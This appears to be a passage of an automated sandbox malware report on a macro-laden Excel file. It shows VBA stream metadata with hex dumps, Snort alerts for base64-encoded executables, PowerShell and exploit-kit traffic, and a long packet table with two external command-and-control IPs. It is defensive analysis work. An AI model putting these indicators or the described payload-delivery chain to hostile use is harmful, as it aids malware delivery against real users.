            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 1f 31 87 5c 95 96 56 5b 03 c2 f3 46 25 e9 37 18 f2 1c d0 c0 52 15 7d cd 1a bb 36 f5 d1 7a d7 d0 7d b9 dc 78 57 1f 5d ed be 32 6c 83 a4 92 bd be e1 00 02 00 b0 04 c1 00 02 00 b5 8a e2 00 00 00 5c 00 70 00 6b cb e5 4b f0 83 23 df 03 f4 3e b9 a4 b2 ea 28 53 ad 65 72 6b fb 83 bf 1d 62 bd c3 9a 2b
            Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 527
            General
            Stream Path:_VBA_PROJECT_CUR/PROJECT
            CLSID:
            File Type:ASCII text, with CRLF line terminators
            Stream Size:527
            Entropy:5.25882062681103
            Base64 Encoded:True
            Data ASCII:I D = " { C A F 1 0 1 F C - 7 5 8 5 - 4 E 8 4 - 8 C D D - 1 C A 2 0 2 9 D 7 6 5 1 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 5 9 5 B B 2 4 2 B 6 4 2 B 6 4 2 B
            Data Raw:49 44 3d 22 7b 43 41 46 31 30 31 46 43 2d 37 35 38 35 2d 34 45 38 34 2d 38 43 44 44 2d 31 43 41 32 30 32 39 44 37 36 35 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
            Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
            General
            Stream Path:_VBA_PROJECT_CUR/PROJECTwm
            CLSID:
            File Type:data
            Stream Size:104
            Entropy:3.0488640812019017
            Base64 Encoded:False
            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
            Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
            Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
            CLSID:
            File Type:data
            Stream Size:2644
            Entropy:3.993722601822243
            Base64 Encoded:False
            Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
            Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
            Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/dir
            CLSID:
            File Type:data
            Stream Size:553
            Entropy:6.374935342192008
            Base64 Encoded:True
            Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . | c h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
            Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 1f 7c 63 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

            Network Behavior

            Snort IDS Alerts

            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
            05/27/24-09:00:53.917151TCP2049038ET TROJAN Malicious Base64 Encoded Payload In Image44349174188.114.97.3192.168.2.22
            05/27/24-09:00:51.165055TCP2018856ET TROJAN Windows executable base64 encoded44349174188.114.97.3192.168.2.22
            05/27/24-09:00:51.165055TCP2047750ET TROJAN Base64 Encoded MZ In Image44349174188.114.97.3192.168.2.22
            05/27/24-09:00:58.159972TCP2020424ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M18049175198.46.178.154192.168.2.22
            05/27/24-09:00:58.159972TCP2020423ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M18049175198.46.178.154192.168.2.22
            05/27/24-09:00:53.346879TCP2025012ET TROJAN Powershell commands sent B64 344349174188.114.97.3192.168.2.22

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            May 27, 2024 09:00:26.245454073 CEST4916180192.168.2.2254.241.153.192
            May 27, 2024 09:00:26.250555992 CEST804916154.241.153.192192.168.2.22
            May 27, 2024 09:00:26.250668049 CEST4916180192.168.2.2254.241.153.192
            May 27, 2024 09:00:26.250842094 CEST4916180192.168.2.2254.241.153.192
            May 27, 2024 09:00:26.255716085 CEST804916154.241.153.192192.168.2.22
            May 27, 2024 09:00:26.838306904 CEST804916154.241.153.192192.168.2.22
            May 27, 2024 09:00:26.838525057 CEST4916180192.168.2.2254.241.153.192
            May 27, 2024 09:00:26.844747066 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:26.849843025 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:26.849925041 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:26.850008965 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:26.855112076 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.382081985 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.382113934 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.382131100 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.382148027 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.382160902 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.382164001 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.382183075 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.382194996 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.382205009 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.382206917 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.382222891 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.382231951 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.382240057 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.382242918 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.382268906 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.382268906 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.382293940 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.382303953 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.387614965 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.387643099 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.387669086 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.387689114 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.387701035 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.387748957 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.388410091 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.476624966 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.476660967 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.476677895 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.476681948 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.476696968 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.476706982 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.476716995 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.476766109 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.481550932 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.481568098 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.481584072 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.481600046 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.481609106 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.481628895 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.481650114 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.486438990 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.486457109 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.486473083 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.486498117 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.486506939 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.486506939 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.486526966 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.486546993 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.491276026 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.491292953 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.491308928 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.491324902 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.491328955 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.491342068 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.491348982 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.491372108 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.491399050 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.496056080 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.496104002 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.941946030 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:28.266956091 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.274027109 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.274099112 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.274204016 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.281210899 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.872950077 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.873028040 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.873080969 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.873087883 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.873089075 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.873117924 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.873153925 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.873172045 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.873172045 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.873192072 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.873225927 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.873231888 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.873291016 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.873295069 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.873307943 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.873346090 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.873368025 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.873368025 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.873404026 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.877342939 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.877387047 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.878297091 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.878334999 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.878372908 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.878407001 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.878792048 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.878823042 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.878870010 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.878870010 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.250036001 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.255430937 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.255551100 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.255786896 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.260636091 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.836250067 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.836272955 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.836309910 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.836363077 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.836378098 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.836446047 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.836457968 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.836461067 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.836477995 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.836494923 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.836494923 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.836494923 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.836509943 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.836513996 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.836532116 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.836532116 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.836555004 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.837224960 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.837248087 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.841547966 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.841577053 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.841593981 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.841622114 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.841640949 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.841640949 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.845586061 CEST4916580192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.850507021 CEST804916554.241.153.192192.168.2.22
            May 27, 2024 09:00:29.850573063 CEST4916580192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.850625992 CEST4916580192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.855479002 CEST804916554.241.153.192192.168.2.22
            May 27, 2024 09:00:30.451380014 CEST804916554.241.153.192192.168.2.22
            May 27, 2024 09:00:30.451451063 CEST804916554.241.153.192192.168.2.22
            May 27, 2024 09:00:30.451464891 CEST804916554.241.153.192192.168.2.22
            May 27, 2024 09:00:30.451479912 CEST804916554.241.153.192192.168.2.22
            May 27, 2024 09:00:30.451504946 CEST804916554.241.153.192192.168.2.22
            May 27, 2024 09:00:30.451520920 CEST804916554.241.153.192192.168.2.22
            May 27, 2024 09:00:30.451519012 CEST4916580192.168.2.2254.241.153.192
            May 27, 2024 09:00:30.451519966 CEST4916580192.168.2.2254.241.153.192
            May 27, 2024 09:00:30.451519966 CEST4916580192.168.2.2254.241.153.192
            May 27, 2024 09:00:30.451539040 CEST804916554.241.153.192192.168.2.22
            May 27, 2024 09:00:30.451555014 CEST4916580192.168.2.2254.241.153.192
            May 27, 2024 09:00:30.451556921 CEST804916554.241.153.192192.168.2.22
            May 27, 2024 09:00:30.451565027 CEST4916580192.168.2.2254.241.153.192
            May 27, 2024 09:00:30.451575041 CEST4916580192.168.2.2254.241.153.192
            May 27, 2024 09:00:30.451580048 CEST804916554.241.153.192192.168.2.22
            May 27, 2024 09:00:30.451595068 CEST4916580192.168.2.2254.241.153.192
            May 27, 2024 09:00:30.451597929 CEST804916554.241.153.192192.168.2.22
            May 27, 2024 09:00:30.451618910 CEST4916580192.168.2.2254.241.153.192
            May 27, 2024 09:00:30.451637983 CEST4916580192.168.2.2254.241.153.192
            May 27, 2024 09:00:30.452173948 CEST4916580192.168.2.2254.241.153.192
            May 27, 2024 09:00:30.452203035 CEST4916580192.168.2.2254.241.153.192
            May 27, 2024 09:00:30.456495047 CEST804916554.241.153.192192.168.2.22
            May 27, 2024 09:00:30.456522942 CEST804916554.241.153.192192.168.2.22
            May 27, 2024 09:00:30.456578970 CEST4916580192.168.2.2254.241.153.192
            May 27, 2024 09:00:30.456578970 CEST4916580192.168.2.2254.241.153.192
            May 27, 2024 09:00:30.456805944 CEST804916554.241.153.192192.168.2.22
            May 27, 2024 09:00:30.456850052 CEST4916580192.168.2.2254.241.153.192
            May 27, 2024 09:00:30.538527012 CEST4916680192.168.2.2254.241.153.192
            May 27, 2024 09:00:30.543514967 CEST804916654.241.153.192192.168.2.22
            May 27, 2024 09:00:30.543586969 CEST4916680192.168.2.2254.241.153.192
            May 27, 2024 09:00:30.543694019 CEST4916680192.168.2.2254.241.153.192
            May 27, 2024 09:00:30.548499107 CEST804916654.241.153.192192.168.2.22
            May 27, 2024 09:00:31.129097939 CEST804916654.241.153.192192.168.2.22
            May 27, 2024 09:00:31.132060051 CEST4916780192.168.2.22198.46.178.154
            May 27, 2024 09:00:31.137140036 CEST8049167198.46.178.154192.168.2.22
            May 27, 2024 09:00:31.137242079 CEST4916780192.168.2.22198.46.178.154
            May 27, 2024 09:00:31.137303114 CEST4916780192.168.2.22198.46.178.154
            May 27, 2024 09:00:31.142256021 CEST8049167198.46.178.154192.168.2.22
            May 27, 2024 09:00:31.337044001 CEST4916680192.168.2.2254.241.153.192
            May 27, 2024 09:00:31.629596949 CEST8049167198.46.178.154192.168.2.22
            May 27, 2024 09:00:31.836268902 CEST4916780192.168.2.22198.46.178.154
            May 27, 2024 09:00:31.838633060 CEST8049167198.46.178.154192.168.2.22
            May 27, 2024 09:00:31.838777065 CEST4916780192.168.2.22198.46.178.154
            May 27, 2024 09:00:31.839399099 CEST804916154.241.153.192192.168.2.22
            May 27, 2024 09:00:31.839581966 CEST4916180192.168.2.2254.241.153.192
            May 27, 2024 09:00:32.388118029 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:32.388266087 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:35.765592098 CEST4916880192.168.2.2254.241.153.192
            May 27, 2024 09:00:35.770560980 CEST804916854.241.153.192192.168.2.22
            May 27, 2024 09:00:35.770633936 CEST4916880192.168.2.2254.241.153.192
            May 27, 2024 09:00:35.770804882 CEST4916880192.168.2.2254.241.153.192
            May 27, 2024 09:00:35.775811911 CEST804916854.241.153.192192.168.2.22
            May 27, 2024 09:00:36.133014917 CEST804916654.241.153.192192.168.2.22
            May 27, 2024 09:00:36.133172989 CEST4916680192.168.2.2254.241.153.192
            May 27, 2024 09:00:36.142448902 CEST4916680192.168.2.2254.241.153.192
            May 27, 2024 09:00:36.147362947 CEST804916654.241.153.192192.168.2.22
            May 27, 2024 09:00:36.384897947 CEST804916854.241.153.192192.168.2.22
            May 27, 2024 09:00:36.384954929 CEST804916854.241.153.192192.168.2.22
            May 27, 2024 09:00:36.384989977 CEST804916854.241.153.192192.168.2.22
            May 27, 2024 09:00:36.385027885 CEST804916854.241.153.192192.168.2.22
            May 27, 2024 09:00:36.385081053 CEST804916854.241.153.192192.168.2.22
            May 27, 2024 09:00:36.385091066 CEST4916880192.168.2.2254.241.153.192
            May 27, 2024 09:00:36.385113955 CEST804916854.241.153.192192.168.2.22
            May 27, 2024 09:00:36.385149956 CEST804916854.241.153.192192.168.2.22
            May 27, 2024 09:00:36.385153055 CEST4916880192.168.2.2254.241.153.192
            May 27, 2024 09:00:36.385199070 CEST4916880192.168.2.2254.241.153.192
            May 27, 2024 09:00:36.385200024 CEST804916854.241.153.192192.168.2.22
            May 27, 2024 09:00:36.385235071 CEST804916854.241.153.192192.168.2.22
            May 27, 2024 09:00:36.385271072 CEST804916854.241.153.192192.168.2.22
            May 27, 2024 09:00:36.385282040 CEST4916880192.168.2.2254.241.153.192
            May 27, 2024 09:00:36.392066002 CEST4916880192.168.2.2254.241.153.192
            May 27, 2024 09:00:36.392170906 CEST804916854.241.153.192192.168.2.22
            May 27, 2024 09:00:36.392226934 CEST804916854.241.153.192192.168.2.22
            May 27, 2024 09:00:36.392237902 CEST4916880192.168.2.2254.241.153.192
            May 27, 2024 09:00:36.392278910 CEST4916880192.168.2.2254.241.153.192
            May 27, 2024 09:00:36.495834112 CEST4916980192.168.2.2254.241.153.192
            May 27, 2024 09:00:37.483433962 CEST8049167198.46.178.154192.168.2.22
            May 27, 2024 09:00:37.483549118 CEST4916780192.168.2.22198.46.178.154
            May 27, 2024 09:00:37.483701944 CEST8049167198.46.178.154192.168.2.22
            May 27, 2024 09:00:37.483705044 CEST4916780192.168.2.22198.46.178.154
            May 27, 2024 09:00:37.483726978 CEST8049167198.46.178.154192.168.2.22
            May 27, 2024 09:00:37.483751059 CEST4916780192.168.2.22198.46.178.154
            May 27, 2024 09:00:37.483773947 CEST4916780192.168.2.22198.46.178.154
            May 27, 2024 09:00:37.483937025 CEST8049167198.46.178.154192.168.2.22
            May 27, 2024 09:00:37.483980894 CEST4916780192.168.2.22198.46.178.154
            May 27, 2024 09:00:37.484941006 CEST804916954.241.153.192192.168.2.22
            May 27, 2024 09:00:37.485002041 CEST4916980192.168.2.2254.241.153.192
            May 27, 2024 09:00:37.485235929 CEST4916980192.168.2.2254.241.153.192
            May 27, 2024 09:00:37.488755941 CEST8049167198.46.178.154192.168.2.22
            May 27, 2024 09:00:37.490113974 CEST804916954.241.153.192192.168.2.22
            May 27, 2024 09:00:38.061413050 CEST804916954.241.153.192192.168.2.22
            May 27, 2024 09:00:38.061534882 CEST4916980192.168.2.2254.241.153.192
            May 27, 2024 09:00:38.064740896 CEST4917080192.168.2.22198.46.178.154
            May 27, 2024 09:00:38.069777012 CEST8049170198.46.178.154192.168.2.22
            May 27, 2024 09:00:38.069865942 CEST4917080192.168.2.22198.46.178.154
            May 27, 2024 09:00:38.069988966 CEST4917080192.168.2.22198.46.178.154
            May 27, 2024 09:00:38.074960947 CEST8049170198.46.178.154192.168.2.22
            May 27, 2024 09:00:38.571190119 CEST8049170198.46.178.154192.168.2.22
            May 27, 2024 09:00:38.571304083 CEST4917080192.168.2.22198.46.178.154
            May 27, 2024 09:00:39.036844969 CEST4917180192.168.2.22198.46.178.154
            May 27, 2024 09:00:39.041879892 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.041977882 CEST4917180192.168.2.22198.46.178.154
            May 27, 2024 09:00:39.042370081 CEST4917180192.168.2.22198.46.178.154
            May 27, 2024 09:00:39.047497034 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.528614044 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.528637886 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.528692007 CEST4917180192.168.2.22198.46.178.154
            May 27, 2024 09:00:39.528695107 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.528727055 CEST4917180192.168.2.22198.46.178.154
            May 27, 2024 09:00:39.528742075 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.528759003 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.528769016 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.528783083 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.528784990 CEST4917180192.168.2.22198.46.178.154
            May 27, 2024 09:00:39.528794050 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.528835058 CEST4917180192.168.2.22198.46.178.154
            May 27, 2024 09:00:39.528846025 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.528855085 CEST4917180192.168.2.22198.46.178.154
            May 27, 2024 09:00:39.528860092 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.528889894 CEST4917180192.168.2.22198.46.178.154
            May 27, 2024 09:00:39.528904915 CEST4917180192.168.2.22198.46.178.154
            May 27, 2024 09:00:39.533737898 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.533766031 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.533797979 CEST4917180192.168.2.22198.46.178.154
            May 27, 2024 09:00:39.533811092 CEST4917180192.168.2.22198.46.178.154
            May 27, 2024 09:00:39.533999920 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.534017086 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.534045935 CEST4917180192.168.2.22198.46.178.154
            May 27, 2024 09:00:39.534060955 CEST4917180192.168.2.22198.46.178.154
            May 27, 2024 09:00:39.618603945 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.618624926 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.618633986 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.618643045 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.618649960 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.618657112 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.618664026 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.618674040 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.618846893 CEST4917180192.168.2.22198.46.178.154
            May 27, 2024 09:00:39.619378090 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.619425058 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.619432926 CEST4917180192.168.2.22198.46.178.154
            May 27, 2024 09:00:39.619441986 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.619457960 CEST8049171198.46.178.154192.168.2.22
            May 27, 2024 09:00:39.619482040 CEST4917180192.168.2.22198.46.178.154
            May 27, 2024 09:00:39.619513988 CEST4917180192.168.2.22198.46.178.154
            May 27, 2024 09:00:39.619935036 CEST8049171198.46.178.154192.168.2.22
